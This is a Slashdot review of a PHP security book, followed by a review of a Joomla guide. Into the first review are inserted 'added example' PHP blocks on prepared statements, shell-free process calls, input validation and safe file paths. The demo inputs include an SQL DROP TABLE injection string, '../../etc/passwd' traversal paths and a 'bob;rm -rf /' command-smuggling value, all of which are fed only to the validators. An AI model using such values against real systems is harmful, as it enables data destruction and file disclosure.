Michael J. Ross writes "The owners and the developers of typical Web sites face a quandary, one often unrecognized and unstated: They generally want their sites' contents and functionality to be accessible to everyone on the Internet, yet the more they open those sites, the more vulnerable they can become to attackers of all sorts. In their latest book, Securing PHP Web Applications, Tricia and William Ballad argue that PHP is an inherently insecure language, and they attempt to arm PHP programmers with the knowledge and techniques for making the sites they develop as secure as possible, short of disconnecting them from the Internet." Keep reading for the rest of Michael's review.

Securing PHP Web Applications
Author: Tricia Ballad, William Ballad
Pages: 336
Publisher: Addison-Wesley Professional
Rating: 7/10
Reviewer: Michael J. Ross
ISBN: 978-0321534347
Summary: A wide-ranging guide to PHP security.

The book was published by Addison-Wesley on 26 December 2008, under the ISBN 978-0321534347. The publisher maintains a Web page for the book, where visitors will find a detailed description, the table of contents, and a sample chapter ("Cross-Site Scripting," Chapter 10) only three pages in length — undoubtedly a record. That is essentially all one will find on that Web page. Most technical publishers offer far more information on the Web pages for each one of their books — such as the preface and index online, updates to the book's content (including reported errata, confirmed and otherwise), descriptions of the chapters, information about and pictures of the author(s), feedback from readers and the media, and, perhaps most valuable of all, the sample code used in the given book. (However, that is less of a factor with this particular book, since it does not contain much sample code.) Many such publisher pages even have links to book- or technology-specific forums, where readers can post questions to the authors, and read other people's questions and the replies.
Addison-Wesley, like all of the Pearson Education imprints, has through the years proven quite sparing with the supplementary online content, thereby no doubt reducing the number of prospective readers and other traffic to their sites.
Despite its fairly modest length (336 pages) in comparison to the average programming book being published these days, Securing PHP Web Applications tries to cover a sizable number of topics, in five parts, which encompass 17 chapters: general security issues; error handling; system calls; buffer overflows and sanitizing variables; input validation; file access; user authentication; encryption and passwords; sessions and attacks against them; cross-site scripting; securing Apache and MySQL; securing IIS and SQL Server; securing PHP; automated testing; exploit testing; designing a secure application; and hardening an existing application. The book concludes with an epilogue on professional habits to improve the security of one's applications, an appendix describing additional resources, a glossary, and an index. Throughout the book, the authors illustrate key ideas with the use of a sample application — in this case, a Web-based guest book.
The first chapter, which is the only one in the first part of the book, is rather brief, but does prime the reader for all the material that follows, because it explains the inherent security problems of Web applications, and explains the dangers of some of the inadequate measures that naive programmers can take, such as security through obscurity, and the common belief that hackers only go after major Web sites.
Chapter 2 focuses on error handling, but begins with an example of SQL injection, and how effective it can be against the first iteration of the guest book application code. The most potentially confusing part of the discussion is when the authors show an SQL injection attack that perverts an INSERT statement by injecting it with an SQL command to drop a table, and the two commands are separated by a semicolon. But then instead of discussing how multiple SQL statements can be separated by semicolons (well, depending upon one's server settings), they discuss separating PHP commands with semicolons, but not SQL commands. Nonetheless, readers will find some good advice on handling unexpected input and using a centralized error-handling mechanism, even if quite simple. Also, the question of whether or not to accept HTML in user input is briefly addressed. However, the material would be more useful if the authors were to explain specifically when htmlspecialchars() should be used instead of htmlentities(). Also, the option of using standard bulletin board codes (such as [b]bold[/b]) should have been mentioned, if only briefly with references to outside resources. At the bottom of page 22, the bare regex following a "!~" is not valid PHP (or even Perl, which it much more resembles). Lastly, one should not follow the recommendation of providing absolutely no feedback to the user as to what characters were invalid in the text they entered. Hackers gain nothing from being told the obvious, that HTML tags are not allowed; but legitimate users will be incensed when told only that the system didn't understand their input, with no indication as to how to make it acceptable.
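The three points the reviewer raises about this chapter (the injected INSERT, the htmlspecialchars()/htmlentities() choice, and telling the user which characters were rejected) are easier to see side by side in code. The following is an added example, not code from the book or its authors; it assumes a PDO connection with the pdo_sqlite extension and a constructed guestbook(name, message) table.

```php
<?php
// Added example (not from the book): the guest-book INSERT written two ways,
// followed by output encoding and a validation routine that names the
// rejected characters. Table layout and the $pdo handle are assumptions.

// Weak form: user text is interpolated straight into the SQL string, so a
// value containing a quote terminates the literal and whatever follows is
// parsed as SQL. Dropping a table this way additionally needs a driver/server
// configured to run several statements per call, as the book's caveat says.
function insertEntryUnsafe(PDO $pdo, string $name, string $message): void
{
    $sql = "INSERT INTO guestbook (name, message) VALUES ('$name', '$message')";
    $pdo->exec($sql);
}

// Hardened form: a prepared statement sends SQL and data separately, so the
// database never parses user text as SQL and quoting is no longer the
// application's job.
function insertEntrySafe(PDO $pdo, string $name, string $message): void
{
    $stmt = $pdo->prepare('INSERT INTO guestbook (name, message) VALUES (:name, :message)');
    $stmt->execute([':name' => $name, ':message' => $message]);
}

// Output encoding for the page that displays entries. htmlspecialchars()
// escapes only the characters that matter to HTML markup (& < > " ');
// htmlentities() additionally converts every character that has a named
// entity. On a UTF-8 page htmlspecialchars() is sufficient and keeps
// non-ASCII text readable in the source.
function renderMessage(string $message): string
{
    return htmlspecialchars($message, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Validation that reports *which* characters were rejected. The allowed set
// (letters, digits, whitespace, basic punctuation) is an assumption.
function findDisallowedCharacters(string $input): array
{
    $disallowedPattern = '/[^\p{L}\p{N}\s.,!?\'"()-]/u';
    preg_match_all($disallowedPattern, $input, $matches);
    return array_values(array_unique($matches[0]));
}

// Demonstration with a constructed in-memory database. The hostile-looking
// name is stored as a literal string; the table survives.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE guestbook (name TEXT, message TEXT)');
insertEntrySafe($pdo, "O'Brien'); DROP TABLE guestbook; --", 'hello');
echo $pdo->query('SELECT COUNT(*) FROM guestbook')->fetchColumn(), " row(s)\n";
echo renderMessage('<b>hi</b> & café'), "\n";
echo htmlentities('<b>hi</b> & café', ENT_QUOTES, 'UTF-8'), "\n";
print_r(findDisallowedCharacters('hello <script>'));
```

insertEntryUnsafe() is included only for contrast and is never called; the demonstration runs the prepared-statement version against the same input and then shows the two encoding functions on a string containing both markup and an accented character.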
In the third chapter, the authors explain the obvious danger of using unsanitized user input within a call to the operating system, such as exec() or system(). The discussion here assumes that you are on a *nix server, not Windows. Two PHP commands are suggested for sanitizing user input, as well as the option and advantages of building a custom API that is limited to only the system calls that should ever be executed within your Web application. On page 33, their test code appears to assume that register_globals has been enabled (so the GET variables in the malicious URL are automatically instantiated and set to the values in the URL), which is disappointing for a book on PHP security, since the dangers inherent in register_globals are so severe that it is now disabled by default, is deprecated in PHP version 5.3.0, and will be completely removed in version 6.
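The "custom API limited to only the system calls that should ever be executed" is the stronger of the two approaches the chapter describes, and it is worth seeing how it differs from merely quoting arguments. The block below is an added example (not the book's code); it assumes a Unix-like host with /usr/bin/file and /usr/bin/wc, PHP 7.4 or later for proc_open() with an array command, and an allow-list that is invented for the illustration.

```php
<?php
// Added example (not the book's code): keeping user input out of the shell.
// Program paths and the permitted-operation table are assumptions.

// Risky pattern the chapter warns about: a request value interpolated into a
// shell command line. Any shell metacharacter in $name changes the command.
function fileTypeUnsafe(string $name): string
{
    return (string) shell_exec("file $name");
}

// First defence: escapeshellarg() wraps the value in single quotes and
// escapes embedded quotes, so the shell sees exactly one argument.
function fileTypeQuoted(string $name): string
{
    return (string) shell_exec('file ' . escapeshellarg($name));
}

// Stronger: a small internal API exposing only the operations the
// application needs, with absolute program paths, an allow-list of
// operations, name validation, and no shell at all.
final class SystemApi
{
    private const COMMANDS = [
        'filetype'  => '/usr/bin/file',
        'wordcount' => '/usr/bin/wc',
    ];
    private string $baseDir;

    public function __construct(string $baseDir)
    {
        $real = realpath($baseDir);
        if ($real === false) {
            throw new InvalidArgumentException('base directory does not exist');
        }
        $this->baseDir = $real;
    }

    public function run(string $operation, string $fileName): string
    {
        if (!isset(self::COMMANDS[$operation])) {
            throw new InvalidArgumentException('operation not permitted');
        }
        // Plain file names only: no separators, no leading dot, bounded length.
        if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$/', $fileName)) {
            throw new InvalidArgumentException('invalid file name');
        }
        $path = $this->baseDir . DIRECTORY_SEPARATOR . $fileName;
        if (!is_file($path)) {
            throw new RuntimeException('no such file');
        }
        // An array command makes proc_open() pass each element as one argv
        // entry without invoking a shell, so no quoting rules apply.
        $proc = proc_open(
            [self::COMMANDS[$operation], $path],
            [1 => ['pipe', 'w'], 2 => ['pipe', 'w']],
            $pipes
        );
        if (!is_resource($proc)) {
            throw new RuntimeException('could not start process');
        }
        $out = stream_get_contents($pipes[1]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($proc);
        return $out;
    }
}

// Demonstration with a constructed file in a temporary directory.
$dir = sys_get_temp_dir() . '/sysapi-demo';
@mkdir($dir);
file_put_contents("$dir/hello.txt", "hello world\n");
$api = new SystemApi($dir);
echo $api->run('filetype', 'hello.txt');
echo $api->run('wordcount', 'hello.txt');
try {
    $api->run('filetype', '../outside.txt');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

fileTypeUnsafe() is shown only for contrast and is never executed. The design point is that validation happens against a fixed vocabulary (operation name, file name pattern) before any process is started, so the question "was this argument quoted correctly?" never arises.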
In Chapter 4, readers get an overview of program and data storage on a computer, including buffers, stacks, and heaps, as groundwork for learning what buffer overflows are and how hackers can try to exploit them to execute database and operating system statements, including using your server as a staging point for remote exploits and denial-of-service attacks. The fifth chapter dovetails nicely with the previous one, because it discusses input validation, which is a key component of avoiding boundary condition attacks. The authors explain the importance of validating tainted data, using character length and regular expressions. One simple countermeasure to such attacks that the authors fail to mention, is simply setting a maximum input length ("maxlength") on HTML "input" tag fields. After all, most entry fields on forms are input tags — not textarea tags, for which the maxlength attribute only specifies wrapping. Using maxlength does not prevent manipulation of POST values, but does prevent the less knowledgeable attacker from overflowing input tag fields.
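The reviewer's observation that maxlength only deters the less knowledgeable attacker is the reason every limit must be enforced again on the server. Here is an added example of that server-side validation (not the book's code); the field names, limits and patterns are assumptions, and it requires the mbstring extension.

```php
<?php
// Added example (not the book's code): server-side validation of guest-book
// fields by character length and pattern. A maxlength attribute in the HTML
// form is a convenience for honest users; every rule is rechecked here.

// Each rule: maximum length in characters (not bytes) and a pattern the whole
// value must match. The /u modifier makes PCRE treat the subject as UTF-8.
// The limits and patterns below are assumptions for the illustration.
const FIELD_RULES = [
    'name'    => ['max' => 40,   'pattern' => '/^[-\p{L}\p{M}\'. ]+$/u'],
    'email'   => ['max' => 254,  'pattern' => '/^[^@\s]+@[^@\s]+\.[^@\s]+$/'],
    // Message: any text except control characters other than tab, LF and CR.
    'message' => ['max' => 1000, 'pattern' => '/^[^\x00-\x08\x0B\x0C\x0E-\x1F]+$/u'],
];

// Returns a field => problem map; an empty array means the input passed.
function validateFields(array $input): array
{
    $errors = [];
    foreach (FIELD_RULES as $field => $rule) {
        if (!isset($input[$field]) || !is_string($input[$field])) {
            $errors[$field] = 'missing';
            continue;
        }
        $value = $input[$field];
        // Reject malformed UTF-8 before any character-level checks, so that
        // mb_strlen() and the /u patterns operate on well-formed text.
        if (!mb_check_encoding($value, 'UTF-8')) {
            $errors[$field] = 'not valid UTF-8';
            continue;
        }
        $value = trim($value);
        if ($value === '') {
            $errors[$field] = 'empty';
            continue;
        }
        if (mb_strlen($value, 'UTF-8') > $rule['max']) {
            $errors[$field] = "longer than {$rule['max']} characters";
            continue;
        }
        if (!preg_match($rule['pattern'], $value)) {
            $errors[$field] = 'contains characters that are not allowed';
        }
    }
    // Fields without a rule are simply ignored rather than stored.
    return $errors;
}

// Constructed inputs: one honest submission, and one that exceeds the form's
// maxlength (which a client can ignore), has a malformed address, and embeds
// a NUL byte in the message.
$good = ['name' => 'Ada Lovelace', 'email' => 'ada@example.com', 'message' => 'Nice site!'];
$bad  = ['name' => str_repeat('A', 41), 'email' => 'not-an-address', 'message' => "hi\x00there"];
var_dump(validateFields($good));
var_dump(validateFields($bad));
```

Length is measured with mb_strlen() rather than strlen() so that a limit of 40 characters means 40 characters regardless of how many bytes each one occupies; the encoding check first guarantees that count is meaningful.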
Chapter 6 explains the risks in working with local and remote files, and why it is critical to not allow mischievous users to do such tricks as inserting a pathname in a filename, when your code is expecting only a simple filename. Unfortunately, some of the code and claims in this chapter are suspect: On page 70, the value of $path_to_uploaded_files is missing a needed trailing forward slash. The suggested method of processing malicious file paths could be made much more simple and secure with the use of basename(). The file_get_contents() attack shown on page 71 again seems to assume that register_globals is enabled; even if it were enabled, the exploit wouldn't work because $file is always set to a value in the script code. The authors seemingly believe that GET variables can override anything in a script. Nonetheless, their advice about handling user-uploaded files is spot on.
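The reviewer's two concrete suggestions for this chapter, the missing trailing slash and the use of basename(), both come down to never trusting a request value as a path. The following added example (not the book's code) shows a resolver built on basename() plus a realpath() containment check, and a minimal upload handler that chooses its own file name; the directory layout and accepted extensions are assumptions.

```php
<?php
// Added example (not the book's code): resolving a user-supplied file name
// against a fixed directory without letting path components through.
// Directory names and the accepted extension list are assumptions.

// Weak form mirroring the chapter's concern: base directory and request value
// concatenated. Besides the separator problem the reviewer notes, "../" in
// $name walks out of the directory.
function uploadPathUnsafe(string $baseDir, string $name): string
{
    return $baseDir . $name;
}

// Hardened form. basename() strips any directory part; the name must equal
// its own basename (so a path was never present), match a conservative
// pattern, and realpath() must confirm the final location is still inside
// the base directory, which also covers symbolic links.
function resolveUploadPath(string $baseDir, string $name): string
{
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        throw new RuntimeException('upload directory unavailable');
    }
    $leaf = basename($name);
    if ($leaf === '' || $leaf === '.' || $leaf === '..' || $leaf !== $name) {
        throw new InvalidArgumentException('file name must not contain a path');
    }
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$/', $leaf)) {
        throw new InvalidArgumentException('file name contains disallowed characters');
    }
    // realpath() removes any trailing separator, so the join is always
    // correct whether or not $baseDir ended with a slash.
    $real = realpath($base . DIRECTORY_SEPARATOR . $leaf);
    if ($real === false) {
        throw new RuntimeException('file does not exist');
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('resolved path leaves the upload directory');
    }
    return $real;
}

// For a fresh upload there is nothing to realpath() yet: accept only an
// allow-listed extension, ignore the client's name entirely, and let
// move_uploaded_file() verify the source really came from the request.
function storeUpload(string $baseDir, array $file, array $allowedExt = ['png', 'jpg', 'pdf']): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('upload directory unavailable');
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        throw new InvalidArgumentException('file type not accepted');
    }
    $target = $base . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    return $target;
}

// Demonstration with a constructed directory and file.
$dir = sys_get_temp_dir() . '/uploads-demo';
@mkdir($dir);
file_put_contents("$dir/report.pdf", '%PDF-1.4 constructed sample');
echo resolveUploadPath($dir, 'report.pdf'), "\n";
foreach (['../report.pdf', 'sub/report.pdf', '..'] as $attempt) {
    try {
        resolveUploadPath($dir, $attempt);
    } catch (Exception $e) {
        echo "$attempt rejected: ", $e->getMessage(), "\n";
    }
}
```

storeUpload() is not exercised by the demonstration because move_uploaded_file() only accepts files that arrived through a real HTTP request; it is included to show that the same name discipline applies at write time, where the safest file name is one the server generates itself.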
Part 4 of the book focuses on user security. The first of its chapters covers user authentication and authorization — combining the two for their sample application — and starting with usernames and passwords. Access denial due to invalid username or password is supposedly illustrated by Figure 7.2, but all that it illustrates is that a concept that needs no visual depiction is not made more clear by trying to represent it with a confusing image. The authors provide a thorough discussion of authentication purposes and methods, as well as password encryption and strength. Yet they provide no rationale for setting the default values for usernames, passwords, and e-mail addresses to " " simply because the columns are non-nullable. After all, a record would only be added to the table if those values were known. Also, in their validateUsernamePassword() function, they've mistakenly commented out the first "return FALSE;" and they create unused variables $username and $password.
Chapter 8 provides an overview of various types of encryption, particularly for passwords, and some recommendations for PHP-supported algorithms. One blemish in this discussion is the claim that the longer the key for decryption, the longer it will take for your application to load the data (presumably the encrypted text) — which doesn't make sense. Also, their password() and login() functions reference class member names of an object not yet defined or explained. Code out of context like this can be confusing to the reader.
Sessions are a key component of maintaining and securing the identity of an authenticated user as she goes from one page to another in your PHP application. In Chapter 9, the authors describe the three major categories of session attacks: fixation, hijacking, and injection. The next chapter addresses cross-site scripting (XSS), but runs only three pages, and provides no examples of an XSS attack, which would have been helpful for the reader to understand how such an attack could try to compromise his PHP code, and what sort of malicious code to look for in his site. However, references to four open source XSS filtering projects are provided, in case the reader would like to learn more about them.
The fifth part of the book is devoted to securing whichever server environment you choose to host your application on — Apache and MySQL, or IIS and Microsoft SQL Server, as well as PHP. In the chapter on PHP, the authors present the Zend Core release of PHP, which can save developers time in installing components of the LAMP stack, and also save them from reinventing the wheel, by using the Zend Framework. Other techniques for hardening PHP are discussed. Chapters 14 and 15 explain how to use automated testing and exploit testing, to increase your application's security, using powerful exploit testing tools — free and proprietary.
The sixth and final part of the book contains two chapters, which purportedly discuss the advantages of designing security into a new application right from the start, and how to improve security in an application that has already been built. In the former chapter, the authors stress the importance of balancing no design ("Skip reading Slashdot for one day...") and too much design (i.e., stalling). But the material mostly consists of the basics of designing a Web application, with no new information on security, and concludes with a brief reiteration of security principles detailed in earlier chapters. The latter chapter offers some good advice on having separate development and test environments, in addition to the production environment. The principles expounded in each of the two chapters do not overlap at all, and yet together they apply equally to new applications under development just as much as they do to finished applications; splitting the principles up does not make sense.
Sadly, the book does not live up to its potential. In general, much of the sample code is sloppy, as exemplified by the instances noted above. The authors and the technical reviewers should have tested the attacks, and thereby found which ones don't work. Even the HTML should not be used by any new Web developer as an example of quality code that adheres to leading standards. In the HTML that they have their sample PHP code generate, the tag attribute values are in single quotes, and not double, which means all of that code would need to be changed to make it compliant with XHTML 1.0. Moreover, by choosing to use single quotes for both the attribute values and the PHP strings, the authors end up having to escape every single attribute value quote mark, which wastes space and looks ridiculous. They repeat this at the end of Chapter 6, but this time with all double quotes. Also, some of the technical decisions are rather odd, such as their setting those default values to spaces in the user table, noted earlier. A few terms are used strangely, as well, such as their statement that IIS's footprint is the number of entry points to it; actually, a Web server software's footprint generally refers to how much memory it consumes. Every chapter ends with a summary, titled "Wrapping It Up," none of which add any value to the book. There are at least three technical errata in the book that should have been caught: spaces in "u + rwx, go + rx" (page 76), and the invalid addresses "www.blog/modsecurity.org" (page 215) and "www.ballad-nonfiction/SecuringPHP/" (page 288; adding ".com" does not fix it).
On the other hand, the book's marketing copy claims that "Tricia and William Ballad demystify PHP security by presenting realistic scenarios and code examples, practical checklists, detailed visuals..." and that is certainly a fair claim. Most of the explanations are straightforward and informative. As a side note, kudos to Addison-Wesley for printing this book on recycled paper; one can only hope that all publishers adopt that policy.
The primary value of Securing PHP Web Applications is that it touches upon security topics that are often glossed over or completely neglected in other PHP security books and articles. This is important, because online miscreants will be searching out every possible chink in your Web site's armor. You should do the same, before they strike — and this book shows how.
Michael J. Ross is a freelance Web developer and writer.
You can purchase Securing PHP Web Applications from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page. -
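As an added example, not code from the book under review or from the reviewer, the following PHP implements the two countermeasures the review discusses for Chapters 5 and 6: server-side length and whitelist-regex validation of tainted input (an HTML maxlength attribute only constrains cooperative browsers, so the same bound must be enforced on the server), and reducing a user-supplied filename with basename() and then checking with realpath() that the result stays inside the upload directory. The directory name, the length limit, the character whitelist and the sample inputs are assumptions made for this demonstration.

```php
<?php
// Added example (not from the book under review): server-side validation
// of tainted input and safe handling of a user-supplied filename.
// Directory names, limits and sample inputs below are assumptions.

declare(strict_types=1);

// Enforced server-side: an HTML maxlength attribute is advisory only,
// a crafted POST request ignores it entirely.
const MAX_USERNAME_LEN = 32;

/**
 * Validate a username with a length bound plus a whitelist regex.
 * Returns the validated string, or null if it fails either check.
 */
function validate_username(string $tainted): ?string
{
    $len = strlen($tainted);
    if ($len === 0 || $len > MAX_USERNAME_LEN) {
        return null;
    }
    // Whitelist: letters, digits, underscore, dot and hyphen only.
    if (!preg_match('/\A[A-Za-z0-9_.-]+\z/', $tainted)) {
        return null;
    }
    return $tainted;
}

/**
 * Resolve a user-supplied filename to a path inside $base_dir.
 * basename() drops any directory component ("../../etc/passwd" -> "passwd");
 * the realpath() prefix check then rejects anything that still escapes
 * the base directory (for example through a symlink). Returns the
 * absolute path to use, or null if the name is unacceptable.
 */
function safe_upload_path(string $base_dir, string $tainted_name): ?string
{
    $base = realpath($base_dir);
    if ($base === false) {
        return null;                         // base directory must exist
    }
    $name = basename($tainted_name);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    // Reject hidden files and anything outside a conservative charset.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\z/', $name)) {
        return null;
    }
    $candidate = $base . DIRECTORY_SEPARATOR . $name;
    if (file_exists($candidate)) {
        $resolved = realpath($candidate);
        if ($resolved === false
            || strpos($resolved, $base . DIRECTORY_SEPARATOR) !== 0) {
            return null;                     // resolved outside the base dir
        }
        return $resolved;
    }
    return $candidate;                       // new file; name already constrained
}

// Demo on constructed inputs (not real requests).
foreach (['alice', str_repeat('a', 40), 'bob;rm -rf /'] as $u) {
    printf("username %-22s -> %s\n",
        var_export($u, true), var_export(validate_username($u), true));
}

$base = sys_get_temp_dir() . '/uploads_demo';   // assumed upload directory
@mkdir($base, 0700);
foreach (['report.pdf', '../../etc/passwd', '.htaccess', 'photo.jpg/../x'] as $f) {
    printf("file %-22s -> %s\n",
        var_export($f, true), var_export(safe_upload_path($base, $f), true));
}
```

Running it shows the traversal attempt collapsing to a plain "passwd" inside the upload directory, the dotfile and the over-long username rejected, and the shell metacharacters refused by the whitelist rather than by any attempt to escape them.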
Joomla! A User's Guide
Michael J. Ross writes "Of all the content management systems (CMSs) from which a Web developer can choose for creating a new Web site, Joomla is generally considered to be one of the top choices -- partly because an experienced developer can create an attractive site faster with Joomla than with the majority of other CMSs. However, Joomla's online documentation leaves much to be desired, as is true for most if not all CMSs. Intermediate and especially new developers need a clear and comprehensive resource that can explain the terminology, customization, administrative panel, and other aspects of Joomla. A promising candidate is a book written by Barrie M. North, titled Joomla! A User's Guide: Building a Successful Joomla! Powered Website." Keep reading for the rest of Michael's review.
Joomla! A User's Guide
Author: Barrie M. North
Pages: 480
Publisher: Prentice Hall PTR
Rating: 8
Reviewer: Michael J. Ross
ISBN: 0136135609
Summary: Learn how to create and manage a website powered by Joomla!
It was published by Prentice Hall, under the ISBNs 0136135609 and 978-0136135609, on 21 December 2007 (although page 233 confusingly suggests that the material was written in November 2006). The book is available not only in print, but in electronic form as well, as part of the Safari Books Online library. On the publisher's Web page for the book, visitors can read the table of contents, the preface, and the index. Also, they can download a sample chapter -- "Creating a Pure CSS Template" -- as a PDF file. Lastly, visitors can check for updates to the book's content, i.e., reported errata, of which there are more than half a dozen, as of this writing.
The majority of the book's 480 pages are organized into 12 chapters, covering a number of topics: an introduction to CMSs and Joomla; installing Joomla; administration basics; content management; menus; extensions; WYSIWYG editing of content; search engine optimization (SEO); building a table-less template; and how to build Joomla sites for a school, a restaurant, and a blog. Four appendices cover: getting help on your Joomla problems; case studies; SEO basics; and installing WAMP5. The book offers plenty of screenshots, which make it possible for someone to follow the discussion even when away from their computer. Sadly, much of the text shown in the illustrations is extremely small, and could prove very difficult to read for anyone with diminished vision. Even some of the captions are so small as to almost require the use of a magnifying glass. Moreover, the illustrations are printed in light gray, which makes the situation even worse.
The intended purpose of the book is "to guide a non-technical user step-by-step in learning how to create and manage a website powered by Joomla" (page 7). The book is definitely geared towards people new to Joomla, and even new to Web development, given the amount of elementary material covered, such as the author's explanation of Joomla's need for a Web server.
In the preface, the author touches upon the growing popularity of Joomla for a wide variety of Web sites. He also mentions that PHP and CSS are not prerequisites for understanding the book; however, readers not well experienced in those technologies will struggle in implementing everything described in the book -- especially templates -- and this is substantiated by readers' comments online. Admittedly, a book that provided adequate coverage of PHP, CSS, and then Joomla, would likely be overwhelming in length. Readers unfamiliar with PHP and CSS should first secure a basic grounding in those technologies, prior to trying to create their own templates or other Joomla extensions. On the other hand, if a reader has no intention of creating any extensions of their own, then they can still use Joomla to build a new Web site, and use this book to learn how to do so.
In the first chapter, the author provides a valuable introduction to CMSs and the advantages they offer in separating content from the Web pages themselves. However, he refers to Joomla as a rebranding of Mambo, while it would be much more accurate to characterize it as a derivative project, having forked from Mambo, which still exists (sort of). The author also lists Joomla's major features, and the basic elements of a Joomla-powered Web site. Installing and configuring a CMS -- particularly for the first time -- is oftentimes a major stumbling block for any Web development newbie. Chapter 2 steps the reader through the process of downloading and installing the latest version of Joomla (the book uses version 1.5 RC1).
In the third chapter, the author explains the most commonly used administrative tasks, and how to accomplish them in the Joomla 1.5 administrative panel. He intentionally does not cover all of the administrative settings, and this may prove frustrating to some readers who are looking for comprehensive coverage. Yet he does note that such readers should consult the official Joomla User Manual. Also available is the Administrator Manual. The fourth chapter describes in detail how Joomla displays content in pages, how it organizes that content in sections and categories, and the role played by the Front Page component. It concludes with a discussion of how to create menu items and how to connect them to components, as well as how to use module content. Especially valuable to Joomla beginners is the explanation of the two methods of deciding what content appears on a site's homepage.
As noted in the preface, the relationship among menus, menu items, pages, and modules, is one of the most confusing aspects of Joomla -- even after the improvements with version 1.5. In Chapter 5, the author explains this relationship, and then the major menu layouts and how to control them using the various sets of parameters. He mentions the overriding of global settings, and this points up how, prior to this, the book should have explained where to change those global settings, and recommended values. The index is of no help, because they are not mentioned. In Chapter 6, the author shows how to install and manage extensions, which comprise components, modules, plug-ins, templates, and languages. (Templates were missing from his list presented in the book's preface.) Chapter 7 examines the use of WYSIWYG editors for changing content on the back-end and front-end.
The most functional and attractive Joomla-powered Web site will be of little value if it receives few visitors. Thus, search engine marketing (SEM), discussed in the eighth chapter, is of critical importance, and the author's largely sensible advice is worth reading -- despite the nonsensical reference to cowboys and cowgirls (on page 198), and his reference to the "miserable failure" Google bomb, which was defused back in January 2007. Note that the links provided to the SEM tools strongly recommended by the author -- WordTracker, PR Prowler, and Perry Marshall -- are affiliate referral links. Thus it seems disingenuous when he writes "...this might be the place I would have a few affiliate links!" (emphasis added). Speaking of emphasis, it seems as if too much weight is given to resources from which the author would receive affiliate compensation. This is not what readers typically expect in a book for which they have paid good money. Also discussed in the chapter are the important topics of Web standards, accessibility, keywords, referral traffic, pay-per-click traffic, Google AdWords, e-mail traffic, and common SEM mistakes. He correctly points out the low SEM value of Joomla's native "Read more..." anchor text. But his recommended solution, a mambot from Run Digital, does not appear to work with Joomla version 1.5.
Most of the templates written for Joomla and Mambo have used tables for page layout, instead of the more accessible and efficient CSS approach. CSS-based templates are only now becoming increasingly available, and Chapter 9 furthers this worthy goal by stepping the reader through the development of a pure CSS template. As noted earlier, readers unfamiliar with CSS will most likely find this chapter quite daunting, if not disheartening. The book's overall tutorial approach kicks into full gear in the last three chapters, in which the author shows in great detail how to create Web sites for a school, a restaurant, and a blog site. This material could prove very helpful to readers who wish to review and put into practice the more theoretical ideas introduced in the earlier chapters.
In general, readers should be pleased with this book. Even though the author is clearly a fan of Joomla, and the tone of the book is positive, he does not hesitate to point out Joomla's flaws, such as the misleading name of a module type. This is rare among technical authors nowadays, and for this Barrie North should be commended. Yet it is odd that he does not mention the obvious misspelling, "Imagess," in Extensions > Module Manager > module > Other Parameters.
Sprinkled throughout all of the chapters, the reader will find short paragraphs, with a dark background, labeled "The Least You Need to Know." These summarize the preceding paragraphs. This could perhaps be justified after a significant number of paragraphs, but unfortunately they also appear after just a couple paragraphs, which makes these "LYNTK" boxes redundant and unnecessary. Even worse, every chapter ends with a summary, which further repeats the boxes' content. With the book nearing 500 pages, the chapter summaries and even the LYNTK boxes should be excised, to good effect. Also, most of the chapters contain at least one footnote; these are not located at the bottom of the page or collected in a special section at the end of the book (as is traditional), but instead listed at the end of the chapter. Such material should instead be integrated into the text, if it is important enough to be included in the book, or left out entirely.
The writing quality of the book is generally solid, and the writing style is straightforward and friendly. Yet it does contain some blemishes that should have been caught by the publisher's editors, e.g., multi-word adjectives missing hyphens; misuse of the terms "that" versus "who"; inconsistent use of lowercase and title case for Joomla roles, even in the same paragraph; the same inconsistency in menu names, such as in Chapter 4; and the inexcusable "try and explain" (should read "try to explain"; page 19, among others). Thankfully, the author intentionally leaves off the silly exclamation mark from the Joomla name, starting after the preface, for greater readability. The book contains some misspellings/errata, such as "eXtensible" (page 2), "Wordpress" (pages 7 and 8), "over writing" (page 22), "Cpanel" (pages 27 and 29), "php html" (page 148), "api" (page 150), "flash" (page 209), "sight" (should read "site"; page 221), and "add fee" (should read "ad fee"; page 225). The author incorrectly states that the acronym PHP stands for only "Hypertext Preprocessor," but it actually is now a recursive acronym of "PHP Hypertext Preprocessor."
Overall, the book's production quality is up to snuff. The book stays open fairly well, despite the absence of any special lay-flat binding. The pages were produced using recycled paper, which is always encouraging to see. Unfortunately, the pages are thinner than in any other technical book I have ever seen, thereby allowing the text on the other side of each page to show through. This exacerbates the aforementioned problem of the text within the figures being difficult to read. Moreover, all of the copies that I have seen have an unusual diagonal ridge along the bottom edge, suggesting that the page cutting machinery was malfunctioning -- at least for one batch of copies produced, and perhaps more. In addition, some of the pages have small ink blotches. At a list price of almost $45, the book might seem a bit pricey. But online bookstores are fully discounting it, such as Amazon.com's current price of under $30.
The book may have some minor weaknesses, noted above, but otherwise, Joomla! A User's Guide is a logically organized and potentially quite valuable resource for beginning and intermediate Joomla developers -- perhaps the best Joomla book currently available.
Michael J. Ross is a Web developer, writer, and freelance editor.
You can purchase Joomla! A User's Guide from amazon.com. -
OLPC's XO As a Wireless Hacking Tool
